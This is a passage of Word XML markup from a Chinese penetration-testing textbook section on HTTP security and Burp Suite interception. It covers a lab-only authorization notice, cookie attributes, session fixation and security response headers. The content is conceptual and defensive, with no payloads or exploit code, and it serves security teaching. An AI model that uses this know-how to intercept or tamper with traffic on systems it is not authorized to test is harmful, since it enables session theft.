          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防基础：HTTP、Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10”的实操节（标②），聚焦安全视角的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补充与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截器的配置与使用，为后续各章漏洞利用提供核心工具能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限以下环境：读者自建的隔离实验室、官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、OWASP Broken Web Applications、HackTheBox、TryHackMe、VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中已取得明确书面授权的系统）。实验所用网络必须与生产网络、公网物理隔离。对未授权系统实施拦截、改包或测试均属违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:id="148" w:name="动机攻击者与防御者视角"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动机：攻击者与防御者视角</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的所有攻防行为，本质上都依附于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈。攻击者若想篡改输入、窃取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、绕过前端校验，第一步就是在客户端与服务端之间获得一个“透明的观察与干预点”——代理。通过代理截停浏览器发出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，在数据到达服务端之前对参数、头字段、Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">甚至完整请求体进行修改，是绝大多数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用的标准前置操作。防御者同样需要该视角：安全测试人员必须看到应用实际发出的请求与收到的响应，才能判断是否存在隐藏参数、弱认证凭据、敏感信息泄露或对安全响应头的错误部署。因此，HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截构成了本书后续所有章节的实操基石。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkStart w:id="149" w:name="http-安全视角cookiesession-与安全相关头"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.2 HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全视角：Cookie、Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与安全相关头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议在标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 7230–7235 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等文档中定义时，主要关注资源获取的语义与传输可靠性。然而，安全属性并非协议最早设计时的核心考量。现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之上叠加了多个安全相关机制以弥补此空白，理解这些机制是发现漏洞的前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的安全属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是无状态协议，服务器通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Set-Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应头向浏览器下发一个小型数据块，浏览器后续请求自动携带该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，从而实现会话维持。攻击者视角下，Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是“窃取会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窃取身份”的关键对象。其安全属性如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：指示浏览器仅通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接发送该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。若未设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure，Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文传输，易被中间人攻击（Man-in-the-Middle，MITM）截获。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：禁止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。这主要用于缓解跨站脚本（XSS）漏洞窃取会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie：攻击者即使注入了脚本，也无法读取设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HttpOnly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。但其并不能阻止攻击者通过被盗用的会话在浏览器内发送请求（此时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仍会自动附带），因此是一种纵深防御而非根治措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在跨站请求中是否被发送，可选值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在用户从外部站点点击链接进入时也不发送（过于严格，可能破坏用户体验）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许顶级导航（如点击链接）时发送，但阻止子请求（如图片、iframe、POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单提交）中发送，能有效缓解跨站请求伪造（CSRF）攻击。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则需同时配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性，表示明确允许跨站发送，适用于第三方内容。SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的机制详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中通常存储的是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（会话标识符），服务端据此查找对应的会话数据。如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可预测、不随机，或在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数中传递（导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露、日志记录），攻击者就可以通过会话固定（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixation）劫持受害者身份。安全会话管理要求：ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由密码学安全伪随机数生成器（CSPRNG）生成、登录后立即更新</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID、设置超时并轮换、仅通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传递且启用上述安全属性。详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章认证与会话攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">重要安全响应头（概述，各章详述）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代浏览器实现了一系列安全响应头，当服务器显式下发时，浏览器会强制执行对应的安全策略，从而阻断某些类别的攻击。这些头的概念在此处集中交代，详细利用与绕过在对应漏洞章节展开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy (CSP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：内容安全策略，通过白名单机制限制页面可加载和执行的资源来源，是抵御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和点击劫持等攻击的核心防御手段。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: default-src 'self'; script-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁止内联脚本与外部不可信域脚本的执行。CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的配置极其复杂，配置失误可能导致策略被绕过或正常功能受损，实战中的绕过见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Strict-Transport-Security (HSTS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">严格传输安全，指示浏览器在指定时间内（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">max-age=31536000; includeSubDomains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）须强制以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问该域名，防止降级攻击与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">剥离。首次访问仍需依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接或预置列表（HSTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">preload）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：阻止浏览器进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型嗅探，强制按服务器声明的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Content-Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析资源，缓解部分基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MIME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">混淆的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：控制页面是否可被嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;frame&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用于防御点击劫持（Clickjacking）。CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">frame-ancestors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令已逐步替代此头。</w:t>
